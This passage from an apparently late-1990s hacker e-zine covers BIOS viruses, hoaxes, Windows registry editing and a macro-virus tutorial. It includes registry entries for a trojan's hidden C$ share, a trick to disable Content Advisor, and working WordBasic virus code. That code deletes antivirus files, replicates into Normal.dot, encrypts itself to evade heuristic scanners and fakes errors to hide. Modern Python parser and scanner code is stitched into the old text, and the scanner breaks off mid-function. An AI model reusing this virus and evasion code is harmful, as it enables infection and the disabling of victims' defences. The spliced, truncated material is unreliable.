A problem that has come up is that when converting your drive to FAT32 with Windows 98 the conversion changes your partition table and your boot record. As these are just a couple of the things that the scanner looks out for and tries to protect, it causes a very big upset with the scanner; the scanner will take none of the grief Windows 98 tries to put it through and starts putting up all sorts of blocks. When you disable the scanner to install Windows 98 and, once it is installed, make the program active again, it will then prompt you asking whether you want the scanner to fix the 'corrupted' drive. Which in these cases will overwrite the old table onto the new and cause chain reactions on most of the programs on your computer. To put it in plain English: "Do not permit the change of overwriting the table".

BIOS Viruses:
-=-=-=-=-=-=-

Motherboards frequently store the BIOS in a type of memory known as flash memory. This is EE-ROM, or Electrically Erasable Read Only Memory. Circuitry on the motherboard can erase the content of the BIOS and then reprogram it. Motherboard manufacturers use this technique so that it's possible to upgrade the BIOS easily, without having to open the case and replace the ROM (Read Only Memory) chip. However there is a small part of the BIOS that is protected against accidental erasure. This is known as the boot block and it's there in case anything goes wrong with the procedure to reprogram the CMOS, which would otherwise leave you with an unbootable machine. So, the boot block contains enough code to allow a new BIOS to be loaded and programmed from a floppy disk or other source.
Clearly, the potential danger is that a virus could attach itself to the BIOS itself - by reprogramming the flash memory - or simply erase the BIOS and thrash your system. Unless you have the special floppy disk at hand with new BIOS code that you can load from the boot block, your system would be as fucked as a dodo. However, reprogramming the BIOS flash memory is not as straightforward. There are two techniques that a virus author could use to achieve this. If the author knows the hardware design of the motherboard, then the virus can include the specific instructions to erase and reprogram the flash. Alternatively, if the BIOS itself contains the code to erase the flash - and some do - then the virus can be written to call these BIOS routines.

BIOS MAP (on average)

*************************************************
*           *           *           *           *
*   Flash   *  System   *   Self    *  Others   *
*   Bios    *  Set-up   *   Test    *   35 %    *
*   20 %    *   30 %    *   15 %    *           *
*           *           *           *           *
*************************************************
\                                   /
 \_____________ 65 % ______________/

Although this may vary from computer to computer it is based on an average, so don't blame me if it's not down to the decimal point.

Hoaxes:
-=-=-=-

Almost as bad as viruses themselves, in terms of the wasted time, bandwidth and hard disk space that they cause, are virus hoaxes. These have been circulating ever since e-mail was invented, and before that on bulletin boards. They are cleverly designed to grab your attention with a warning of a virus spread by e-mail that can cause severe catastrophe. Such dire happenings as erased files, corrupt hard disks, dying pets and toilet seats being left up are frequently cited. Gullible readers are then further ensnared by an attempt to give the warning authenticity, by quoting an authority that the reader might believe, such as Norton or Microsoft. Finally, public-spirited recipients are conned by an appeal to spread the warning to prevent your closest friends and family from being infected.
To give an example of a typical virus hoax message: "There is a computer virus that is being sent over the Internet". So basically if you see a newsgroup message saying "A Moment of Silence", don't read the message, delete it immediately. As this type of file could be like some viruses that completely rewrite your hard disk, sending everything on it to hell. This would only work if the sender posted in HTML and included some hostile Java bug. So if you really want a piece of advice, tell your mates about this orally, not through e-mail, as that way they might think it's one of these viruses. Look out for one of the common ones such as 'GOOD TIMES' which has been circulating for several years now.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
To get a Dr. Solomon's CIH virus detector and removal go to:
http://www.drsolomon.com/vircen/valerts/win32cih.html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

HitMan
[-=http://hitman.it.8m.com=-]
[-=vectra500@geocities.com=-]

:..::..End Of File..::..:

:..::..File 8 Of 14.::..:
:..Editing The Registry.:
:..::.:.By Cyborg.:.::..:

<*> Introduction

The Registry is a central database that is created by Windows 95 during installation. The entries in that database consist of the hardware, software, users, and preferences data for a single computer, or any computer on a network. Whenever the user makes changes to the Control Panel settings, File Associations, System Policies, or installed software, the changes are reflected in the Registry.

Ok, if you have ever read any files dealing with the Registry before you'll notice the first thing the author says is back up your Registry.
I personally couldn't give a shit; if you have to reinstall Windows it is of no consequence to me.

<*>----------<*>----------<*>----------<*>----------<*>----------<*>

My Computer
 |
 +-- Hkey_Classes_Root
 +-- Hkey_Current_User
 +-- Hkey_Local_Machine
 +-- Hkey_Users
 +-- Hkey_Current_Config
 +-- Hkey_Dyn_Data

<*>----------<*>----------<*>----------<*>----------<*>----------<*>

<*> Registry Editor

You can find the Registry Editor in c:\windows\regedit.exe, or whatever non-standard name you chose as your Windows directory. Copy that onto a backup disk if it pleases you to do so. For future reference you need only choose Run|Regedit if you only want to run the program. Once Regedit is open you should see My Computer and six HKEY folders. As your tool of control over the Windows environment you will have to know Regedit intimately. There is no point being in the driving seat if you can't use a steering wheel, and there is no point getting into a car if you don't know how to turn the keys. Enough with the confusing metaphors. Below is an extract from a Windows help topic:

"Overview Of Registry Editor. Registry Editor is an advanced tool that enables you to change settings in your system Registry, which contains information about how your computer runs. Generally, it is best to use Windows controls to change your system settings. You should not edit your Registry unless it is absolutely necessary. If there is an error in your Registry, your computer may become non functional. If this happens, you can restore the Registry to its state when you last successfully started your computer. For instructions, see Related Topics below."

As you can see it is the usual bullshit from the bureaucrats at Microsoft. I think what they are really trying to say is that if you start fucking with the Registry you have passed the point of no return. Bill Gates asks you not to go down that road.
Warning users off from things that might get icky is a sort of Microsoft trademark. They are safe in the knowledge that their half-assed assessment of Regedit will frighten most new users away. The most key utility for controlling your Win32 box is hidden away in c:\windows with no shortcuts and a whole nine lines devoted to describing it, most of which fits into the Microsoft play-it-safe agenda.

<*> Hkey Definitions

{1} Hkey_Classes_Root
This key points to a branch of Hkey_Local_Machine that describes certain software settings. This key contains essential information about OLE and drag and drop operations, shortcuts, and core aspects of the Windows 95 GUI which we all think are so pretty =).

{2} Hkey_Current_User
This key points to a branch of Hkey_Users for the user who is currently logged onto the system. Sort of like the equivalent of the Unix who command, but not really.

{3} Hkey_Local_Machine
Contains computer-specific information about the type of hardware, software, and other preferences on a given PC. This information is used for all users who log onto this computer. The data is stored in machine code. The software side often includes the serial keys for products you have registered and sometimes encrypted passwords.

{4} Hkey_Users
This key contains information about the users that log onto the computer. Both generic and user-specific information is used, and each user who uses the system has their own Subkey to accompany the .pwl file in c:\windows. The .pwl file contains the password data whilst the specified Subkey contains all other information.

{5} Hkey_Current_Config
This key points to a branch of the key Hkey_Local_Machine\Config that contains information about the current hardware configuration. It is updated when you use the Add New Hardware program.

{6} Hkey_Dyn_Data
This key points to a branch of Hkey_Local_Machine that contains various bits of information regarding the system's Plug and Play configuration.
This information is DYNAMIC, meaning that it may change as devices are added to or removed from the computer.

<*> Disabling Content Advisor Ratings

The thing about the Registry is that although Microsoft lean on it to keep Windows tip-top, they are more dependent on it than you might realise. I mean that they utilise it in the running of other Microsoft products. Internet Explorer for instance, although it has been said that it is an integral part of Windows (Microsoft are still in court over that one). The insides of IE are stored in the Registry, including its Internet Options. I have read Usenet posts about reg keys that lower the security zone in IE or enable Java and other malicious things. Take for example the password-encoded censor, Content Advisor Ratings. If you want to disable its page blocking, open up your Regedit and find the key below:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key

Now just rename Key to something else, e.g. KeyFucked. The next time the Content Advisor Ratings are running the system will not be able to find the key it is searching for. The key actually contains the encrypted password information. I'm sure you can already think of ways that this might be useful. If you are interested in this topic I suggest you do a net search on algorithms.

<*> Hidden Shares

You must have seen the hype concerning all those Windows trojans. Any guy off the street could own a Windows box, am I right? Well anyone who has ever had to remove a nasty proggie will know where the server implants itself: the Registry. For the trojan to function 24/7 it needs to initialise every time Windows starts up. Now I don't think Back Orifice would have been quite as popular if it required you to place a shortcut in the Startup folder or a line in win.ini. You can create the lame trojan effect with a Registry key that uses the DOS prompt as the client for controlling the target computer. This works by connecting to shares.
Shares are what Windows uses to share resources from computer to computer. The NetNinja Setup trojan creates the C$ admin share in:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$

This will assign the remote shared drive to the next available letter on the user's machine and grants full read/write access. When run, the Setup trojan creates a hidden share of drive C: and it places four entries in that key as follows:

"Flags"=dword:00000302
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000

Two things cause the share to be invisible. The "$" at the end of the name hides any share from the NET VIEW command and from Net Watcher's shared folder listing. The Setup Trojan can be downloaded from:

http://www.netninja.com/files/SetupTrojan.zip

<*> Registry Programming

Now, before I start I must say that there really is no such thing as Registry programming as such. Registry information is not like a programming language; you're not really supposed to make reg keys. Although it is viable to reprogram your Registry with programs through various programming languages, that is entirely different. What I'm talking about is generally called Registry editing. It is similar to patching hex or binary, because if you move one space or character out of place then the executable will dysfunction, no questions asked. It is important to understand this. However, editing your Registry is easier because its values are often represented by real words, and the more you look at and change keys, the more you will recognise things that repeat. Of course, the reason that reg keys don't equate to a programming language is because there are only similarities, never defined code. They use all sorts of values as well, such as binary, hex, hexadecimal etc. Open up all reg keys in Wordpad and save new ones in Wordpad. It is important you use Wordpad and not any other text editor. Below is a reg key which opens up all files with an unrecognised file extension with DOS Edit.
Instead of opening the Open With dialog box you will be brought straight into DOS Edit to view the files. This is handy for viewing files made in Unix with no extensions. Note the Registry definition "ASCII Viewable Document", which means a text file: "Content Type"="text/plain". Of course if you have ever fooled around with DOS Edit before you will notice it doesn't support executables. This means if you use it to open a .exe file it will represent it in text as best as is possible. This key also defines .nfo and .diz as plain text file types. This is handy because although they are famous file extensions they were not created with any text editor in mind, so this reg key tells the system they are text files without having to reformat them with a fixed text editor.

----- begin dosedit.reg -----
REGEDIT4

[HKEY_CLASSES_ROOT\asciifile]
@="ASCII Viewable Document"
"EditFlags"=hex:00,00,01,00

[HKEY_CLASSES_ROOT\asciifile\Shell]
@=""

[HKEY_CLASSES_ROOT\asciifile\Shell\open]

[HKEY_CLASSES_ROOT\asciifile\Shell\open\command]
@="edit.com %1"

[HKEY_CLASSES_ROOT\asciifile\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\shell32.dll,64"

[HKEY_CLASSES_ROOT\.diz]
@="asciifile"
"Content Type"="text/plain"

[HKEY_CLASSES_ROOT\.nfo]
@="asciifile"
"Content Type"="text/plain"
----- end dosedit.reg -----

<*> Extracting Registry Data

Now we will take a look at some Registry data. Here is an example of a Perl script taken from 'Learning Perl on Win32 Systems'.

----- begin reg.pl -----
#! c:\perl\bin\perl.exe
use Win32::Registry;

# Subkey under HKEY_LOCAL_MACHINE that holds the Windows version data.
$p = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion";

# Open the subkey through the $HKEY_LOCAL_MACHINE object the module exports.
$main::HKEY_LOCAL_MACHINE->Open($p, $CurrVer) || die "Open: $!\n";

# GetValues fills %vals with name => [name, type, data] entries.
$CurrVer->GetValues(\%vals);
foreach $k (keys %vals) {
    $key = $vals{$k};
    print "$$key[0] = $$key[2]\n";   # value name = value data
}
----- end reg.pl -----

<*> Hkey_Local_Machine Subkey Functions

As anyone who is experienced in using the Registry will tell you, the Hkey_Local_Machine directory is the key to controlling your Windows box.
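As an added example (my own code, not the article's and not from 'Learning Perl on Win32 Systems'), here is a Python parser for the REGEDIT4 export format that dosedit.reg uses, run over a constructed export that includes the four LanMan\C$ entries from the Hidden Shares section; it decodes the string, dword and hex value syntaxes and reports hidden shares (names ending in "$") and autostart entries. The Run and RunServices keys are real Win9x autostart locations; the "example" entry under Run is made up for the sample.

```python
import re

# Constructed REGEDIT4 export (not a dump of a real machine). The LanMan\C$
# values copy the four entries the article lists for the Setup trojan; the
# asciifile entries come from dosedit.reg; the Run entry is made up to show
# the autostart location the article says trojans need.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
"Flags"=dword:00000302
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000

[HKEY_CLASSES_ROOT\asciifile]
@="ASCII Viewable Document"
"EditFlags"=hex:00,00,01,00

[HKEY_CLASSES_ROOT\asciifile\Shell\open\command]
@="edit.com %1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"example"="C:\\WINDOWS\\example.exe"
"""

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')

LANMAN = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan"
RUN_KEYS = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
            r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices")


def _unescape(s):
    """REGEDIT4 strings escape backslash and double quote with a backslash."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_value(raw):
    """Return (type, data) for the three value syntaxes dosedit.reg uses."""
    if raw.startswith('"') and raw.endswith('"') and len(raw) >= 2:
        return ("REG_SZ", _unescape(raw[1:-1]))
    if raw.startswith("dword:"):
        return ("REG_DWORD", int(raw[6:], 16))
    if raw.startswith("hex:"):
        return ("REG_BINARY", bytes(int(b, 16) for b in raw[4:].split(",") if b))
    raise ValueError("unsupported value syntax: %r" % raw)


def parse_reg(text):
    """Parse a REGEDIT4 export into {key path: {value name: (type, data)}}.
    '@' is the key's default value, as in the article's listing."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != "REGEDIT4":
        raise ValueError("not a REGEDIT4 export")
    keys, current = {}, None
    for line in lines[1:]:
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            raise ValueError("malformed line: %r" % line)
        name = "@" if m.group(1) == "@" else _unescape(m.group(2))
        keys[current][name] = parse_value(m.group(3))
    return keys


def _lookup(keys, wanted):
    """Registry paths are case-insensitive, so match them that way."""
    wanted = wanted.lower()
    for key, values in keys.items():
        if key.lower() == wanted:
            return values
    return {}


def find_hidden_shares(keys):
    """(share name, path) for each LanMan share whose name ends in '$',
    which NET VIEW and Net Watcher will not list."""
    prefix = LANMAN.lower() + "\\"
    found = []
    for key, values in keys.items():
        if key.lower().startswith(prefix):
            share = key[len(prefix):]
            if share.endswith("$") and "\\" not in share:
                found.append((share, values.get("Path", ("REG_SZ", ""))[1]))
    return found


def find_run_entries(keys):
    """(value name, command) for everything registered to start with Windows."""
    return [(name, data) for run in RUN_KEYS
            for name, (_kind, data) in _lookup(keys, run).items()]


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    print("hidden shares:", find_hidden_shares(parsed))
    print("run entries:  ", find_run_entries(parsed))
```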
Here is a brief rundown of its standard Subkeys.

--> /Config    [ A collection of configurations for the local computer. ]
--> /Enum      [ Info on the system's installed hardware devices. ]
--> /Hardware  [ Info on the ports and modems used with HyperTerminal. ]
--> /Network   [ Info created when a user logs on to a networked computer. ]
--> /Security  [ Info on network security and remote administration. ]
--> /Software  [ Info about software and its configuration on the system. ]
--> /System    [ The database that controls system start-up, device driver loading, Windows 95 services, and O/S behaviour. ]

<*> Signing Off

Cyborg
cyborg@disinfo.net
http://cyborg.ie.8m.com
"its not stolen, it fell off the back of a truck"

[mousey] [franco] [hitman] [simo] [r0b] [cheesy] [gpf#2] [crypt0genic] [demonr] [alan509] [darkflame] [crossfire] [zirqaz] [force] [zomba] [axcess] [firestarter] [freeman] [ego] [sunburst] [bluecat] [lordphaxx] [hellbent] [tefx] [g_h] [rekcah] [neonbunny] [n1s] [h2so4] [npn] [call] [tds] [swat] [darkcyde] [scorpion] [#hackers_ireland] [#hackerzlair]

:..::..End Of File..::..:

:..::..File 9 Of 14.::..:
:...Making Macro Virii..:
:.::.:.:.By Tefx.:.:.::.:

<*> tefx@hotmail.com
http://www.infowar.co.uk/ampersand

Making Macro Virii - Another FAQ

[9] - Retro Commands
[10] - Anti Heuristic (Encryption)
[11] - Stealth (ToolsMacro And File Save)
[12] - Multi Lingual
[13] - Polymorphism
[14] - Advanced and Weird Techniques

Firstly there are a few things you should know:

1. I am not teaching Word Basic! I am showing you macro virii techniques.
2. I assume you know Basic/WordBasic or are able to comprehend it.
3. I personally assume no responsibility for incidents relating indirectly/directly to this article.
4. Most of the techniques shown will be picked up by AV scanners, so you will have to use fairly complicated techniques to avoid detection. (Anti Heuristic)

Warning! Backup all found copies of "NORMAL.DOT" - I mean it! Believe me. YOU WON'T REGRET IT!

If you don't yet have an understanding of Basic, get one. I will be using WordBasic (6.0), not VBA ('97), as I understand it and it's easier to make. So if you have 97 look up "equivalent commands" in the VBA help file.

[9] - Retro Commands

Retro is where the virus takes revenge against the scanner, deleting it! I was going to show you some of the many retro virii but I only needed to show you one, "AntiAVs": ingenious. I have only shown the retro commands.

> Sub MAIN
> t1$ = "Found virus "
> t2$ = " and has been clean."
> t3$ = "AntiAVs"
> DisableInput 1
> On Error Resume Next
> AV1$ = Files$("C:\PC-Cillin 95\Scan32.dll")
> If AV1$ = "" Then Goto AV2
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
> Print #1, "del c:\pc-cil~1\*.dll >nul"
> Close #1
> Kill "C:\PC-Cillin 95\Lpt$vpn.*"
> 'MsgBox t1$ + "PC-CILLIN 95" + t2$, t3$, 48
>
> AV2:
> AV2$ = Files$("C:\PC-Cillin 97\Scan32.dll")
> If AV2$ = "" Then Goto AV3
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
> Print #1, "del c:\pc-cil~1\*.dll >nul"
> Close #1
> Kill "C:\PC-Cillin 97\Lpt$vpn.*"
> 'MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48
>
> AV3:
> AV3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll")
> If AV3$ = "" Then Goto AV4
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul"
> Print #1, "del c:\tsc\pc-cil~1\*.dll >nul"
> Close #1
> Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*"
> 'MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48
>
> AV4:
> AV4$ = Files$("C:\Zlockav\Gsav.dat")
> If AV4$ = "" Then Goto AV5
> Kill AV4$
> Kill "C:\Zlockav\Gsav.cas"
> 'MsgBox t1$ + "Zlock" + t2$, t3$, 48
>
> AV5:
> AV5$ = Files$("C:\VB7\Virus.txt")
> If AV5$ = "" Then Goto AV6
> Kill AV5$
> 'MsgBox t1$ + "VB7/VB95" + t2$, t3$, 48
>
> AV6:
> AV6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat")
> If AV6$ = "" Then Goto AV7
> Kill AV6$
> Kill "C:\Program Files\Symantec\Symevnt.386"
> 'MsgBox t1$ + "NAV95" + t2$, t3$, 48
>
> AV7:
> AV7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat")
> If AV7$ = "" Then Goto AV8
> Kill AV7$
> Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll"
> 'MsgBox t1$ + "VirusScan95" + t2$, t3$, 48
>
> AV8:
> AV8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat")
> If AV8$ = "" Then Goto AV9
> Kill AV8$
> Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll"
> 'MsgBox t1$ + "VirusScan95 3.0" + t2$, t3$, 48
>
> AV9:
> AV9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def")
> If AV9$ = "" Then Goto AV10
> Kill AV9$
> Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd"
> 'MsgBox t1$ + "F-Prot 95" + t2$, t3$, 48
>
> AV10:
> AV10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe")
> If AV10$ = "" Then Goto AV11
> Kill AV10$
> Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
> 'MsgBox t1$ + "AVP 95" + t2$, t3$, 48
>
> AV11:
> AV11$ = Files$("C:\TBAVW95\Tbscan.sig")
> If AV11$ = "" Then Goto exit
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* >nul"
> Print #1, "del c:\Tbavw95\Tb*.* >nul"
> Close #1
> Kill "C:\Tbavw95\Tbavw95.vxd"
>
> exit:
> End Sub

[10] - Anti Heuristic (Encryption)

The idea behind encryption, I believe, was first conceived by NJ with the Killok virus. The principle is simple, and so is the encryption, as any ^real^ encryption would take years as WordBasic is so slow!
The reason for encryption (as if it isn't obvious enough) is to combat heuristic scanners, which often just search for MacroCopy in the document, or RndWord in the case of Wazzu. Encrypting a line is easy: it is just adding 1 (or any number) to the ASCII value of each character of the infection code.

A simple macro virus (The Q Virus):

> On Error Resume Next              'Just carry on if an error occurs
> File$=filename$()+":AutoOpen"     'The active file
> Global$="Global:AutoOpen"         'The global template
> MacroCopy file$,global$
> FileSaveAs .Format = 1
> MacroCopy Global$,File$

This is incredibly simple as it requires no checking routine: it first tries to copy the macro from the file to the global template, then tries to copy the macro from the global template to the active file. So it doesn't need to check! But anyway, back to the encryption. If we add 1 to the ASCII value of each character of each line we get this result:

> Po!Fssps!Sftvnf!Ofyu
> Gjmf%>gjmfobnf%)*,#;BvupPqfo
> Hmpcbm%>#Hmpcbm;BvupPqfo#
> NbdspDpqz!gjmf%-hmpcbm%!
> GjmfTbwfBt!/Gpsnbu!>!2
> NbdspDpqz!Hmpcbm%-Gjmf%

So the AutoOpen macro must decrypt the above code, run it, then delete it; we put the above data into an array to give this lovely piece of code:

Macro AutoOpen
Sub Main
Screen Updating 0
DisableInput 1          ' Stop the user interrupting me
ScreenUpdating 0        ' Stop the user seeing what's really happening
A$(1)="Po!Fssps!Sftvnf!Ofyu"
A$(2)="Gjmf%>gjmfobnf%)*,#;BvupPqfo"
A$(3)="Hmpcbm%>#Hmpcbm;BvupPqfo#"
A$(4)="NbdspDpqz!gjmf%-hmpcbm%!"
A$(5)="GjmfTbwfBt!/Gpsnbu!>!2"
A$(6)="NbdspDpqz!Hmpcbm%-Gjmf%"
ToolsMacro .Name = "Virus", .Show = 1, .Edit    ' Create a new macro to hold the decrypted code
For i = 1 To 6                      ' Loop for every command
  For x = 1 To Len(A$(i))           ' Loop for each character in the encrypted command
    b = Asc(Mid$(A$(i), x, 1))
    c = b - 1
    If c < 0 Then c = c + 255
    d$ = d$ + Chr$(c)
  Next x                            ' Decrypt the command
  Insert d$                         ' and paste it into the new file
  InsertPara                        ' and press enter
  d$ = ""                           ' Clear the decrypted code to start again
Next i                              ' Onto the next command
DocClose 1                          ' Close the macro
Virus                               ' Run the code
ToolsMacro .Name = "Virus", .Show = 1, .Delete  ' And delete it
End Sub

This works by decrypting the macro, which in turn copies "AutoOpen" to the global template or the active file; then the AutoOpen macro deletes the encrypted version. To include a payload, either add the payload to the encrypted macro or have a separate encrypted macro. Keep in mind this process of encryption.

Just as easily we could insert "+" into the commands to hide them from the AV scanners, e.g.

> A$(1)="O"+"n E"+"rror"+" R"+"esu"+"me Next"
> A$(2)="Fil"+"e$"+"=fil"+"ena"+"me$()+"+chr$(34)+":Au"+"toOp"+"en"+chr$(34)
> A$(3)="Gl"+"oba"+"l$="+chr$(34)+"Gl"+"oba"+"l:A"+"uto"+"Op"+"en"+chr$(34)
> A$(4)="Ma"+"cro"+"Cop"+"y fil"+"e$,g"+"lob"+"al$ "
> A$(5)="File"+"Save"+"As"+" ."+"For"+"ma"+"t = 1"
> A$(6)="Ma"+"croC"+"op"+"y G"+"loba"+"l$,Fi"+"le$"

So without the need for encryption, an anti-heuristic method is achieved; this also means that the macro's copying routine works faster, and it's easier to encode.

The other process is to disguise the commands by using the \ line-continuation character, like this:

> FileSaveAs \
> .Format=1

Then putting comments after it:

> FileSaveAs \'Hsjhdshd
> .Format=1 'hnjdshjd

[11] - Stealth (ToolsMacro And File Save)

The ToolsMacro problem is that if the user runs it, it will show them the virus. The options are to remove it, or to have it fake a lame memory error:

+ Removal Method

> ToolsCustomizeMenus .Name = "ToolsMacro", .Menu = "Tools", .Remove

This removes ToolsMacro from the menu.

+ Lame Method 1

When the user tries to run Tools|Macro nothing happens:

> Sub Main
> End Sub

+ Lame Method 2

When the user tries to run Tools|Macro a lame memory error comes up:

> Sub Main
> MsgBox "WordBasic Memory error -7"
> End Sub

+ Primitive Tools Macro Routine

This just shows a fake box with an error message when you try to do things.

> Sub main ' ToolsMacro
> Dim ComboBox1$(0)
> ComboBox1$(0) = ""
> Dim ListBox1$(0)
> ListBox1$(0) = ""
> Dim DropListBox2$(0)
> DropListBox2$(0) = "Normal.dot"
> DisableAutoMacros 0
> Begin Dialog UserDialog 442, 320, "Macro"
> PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2
> CancelButton 290, 43, 141, 21
> PushButton 290, 72, 141, 21, "&Run", .Definierbar3
> PushButton 290, 102, 141, 21, "&Edit", .Definierbar4
> PushButton 290, 130, 141, 21, "&Delete", .Definierbar5
> PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6
> ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
> Text 6, 223, 93, 13, "Macros &Available In:", .Text1
> Text 7, 259, 109, 13, "Descr&iption:", .Text2
> Text 7, 6, 93, 13, "Macros:", .Text3
> ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1
> DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2
> End Dialog
> Redim dlg As UserDialog
> If Dialog(dlg) = 0 Then
> Cancel
> Else
> MsgBox "Not enough memory", "WordBasic Err = 7"
> End If
> End Sub

+ The FileSaveAs Problem

The problem is that once the file is a template, Word acts like an absolute bugger. Check this yourself: try FileSaveAs with a template. It's a git. The solution is to create a new file using the infected document (template) and then infect that.
Complex :-X (i.e. we make a new non-template clean copy and then do the dirty work). I learned this method from "Jackie Querty [29A]" and stole the code from his phile.

> Sub FileSaveAs                    ' Our "FileSaveAs" macro
> On Error Goto endFileSaveAs       '
> Dim dlg As FileSaveAs             ' Declare dlg as FileSaveAs dialog box
> GetCurValues dlg                  ' Get current values into dlg
> If dlg.Format <> 1 Then           ' Not a template? (i.e. not infected?)
> Dialog dlg                        ' No, a clean document, show box
> FileSaveAs dlg                    ' Save the new document
> Infect(dlg.Name)                  ' Infect it! go!
> Else                              ' It's a template (i.e. it's infected)
> TempWindow = Window()             ' Get current window (template)
> OriginalName$ = dlg.Name          ' Get original document name
> FileNew .Template = FileName$()   ' Create new doc based on template!
> On Error Goto CloseDoc            ' Now on: if any error close new doc
> GetCurValues dlg                  ' Get current values for new doc
> dlg.Name = OriginalName$          ' Change doc name for original one
> Dialog dlg                        ' Ok, show FileSaveAs dialog box
> FileSaveAs dlg                    ' Save the new document
> On Error Goto endFileSaveAs       ' Now on: if any error just go
> Infect(dlg.Name)                  ' Ok, infect new document
> If TempWindow >= Window()         '
> TempWindow = TempWindow + 1       ' Get old template window number
> EndIf                             '
> WindowList TempWindow             ' Make it the active window
> CloseDoc:                         '
> FileClose 2                       ' Close it without prompting
> End If                            '
> endFileSaveAs:                    ' We're done! "SaveAs" problem fixed!
> End Sub                           '

[12] - Multi Lingual

Another problem faced by VX, and we thought MicroShaft was here to help :) Basically the problem is in the menus: ToolsMacro won't work in the German version, as it is called ExtrasMakro (I think). So Microshaft, to the rescue, have provided us with the means to solve this problem.

+ Simple method...

When infecting Normal.dot don't just do

> MacroCopy F$,"Global:ToolsMacro"

Use this as well:

> MacroCopy F$,"Global:ExtrasMakro"

So you are copying the same macro to the different lingual commands.
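The two hiding tricks from section [10] (shifting every character by one, and chopping the command strings into "+"-joined fragments), together with the file-deleting retro commands of section [9], are exactly what a scanner's heuristics have to see through. What follows is an added example written for this edit, not code from the article or from any AV product: a small Python scanner that undoes both obfuscations on each string literal of a macro's source and reports lines whose decoded text contains a replication or destructive keyword. The keyword list, the sample macro lines and the shift range of 1 to 3 are assumptions made for the example.

```python
"""Heuristics for obfuscated WordBasic / VBA macro source.

Added example (not from the article): undo the two hiding tricks it
describes, an ASCII shift applied to whole lines and string literals
chopped into "+"-joined fragments, then look for replication or
destructive keywords in the decoded text.
"""
import re

# Keywords a macro scanner would want to see, assumed for this example:
# WordBasic replication commands plus the AV-killing calls from the
# retro section.
SUSPECT_KEYWORDS = ("MacroCopy", "FileSaveAs", "ToolsMacro", "AddAddIn",
                    "SendKeys", "SetAttr", "Kill", "autoexec.bat")

STRING_LITERAL = re.compile(r'"([^"]*)"')
CONCAT = re.compile(r'"\s*\+\s*"')      # the join point in "Ma"+"cro"


def shift_text(text, delta):
    """Add delta to every character code, wrapping at 256 (the article
    adds 1 to encrypt, so decryption is delta = -1)."""
    return "".join(chr((ord(ch) + delta) % 256) for ch in text)


def find_keywords(text):
    """Case-insensitive keyword hits in text, sorted for stable output."""
    low = text.lower()
    return sorted(kw for kw in SUSPECT_KEYWORDS if kw.lower() in low)


def analyse_line(line, max_shift=3):
    """Return [(technique, keyword), ...] for one line of macro source."""
    findings = []

    # 1. Split literals: collapse "a"+"b" into "ab", then inspect each
    #    literal. If collapsing changed nothing, the keyword was simply
    #    stored in a string, which is still worth a look.
    joined = CONCAT.sub("", line)
    technique = "split-literal" if joined != line else "literal-code"
    for literal in STRING_LITERAL.findall(joined):
        findings += [(technique, kw) for kw in find_keywords(literal)]

    # 2. Shifted text: try small negative shifts on the original literals
    #    and see whether a command name falls out.
    for literal in STRING_LITERAL.findall(line):
        for delta in range(1, max_shift + 1):
            findings += [(f"shift-{delta}", kw)
                         for kw in find_keywords(shift_text(literal, -delta))]
    return findings


def scan_macro(source):
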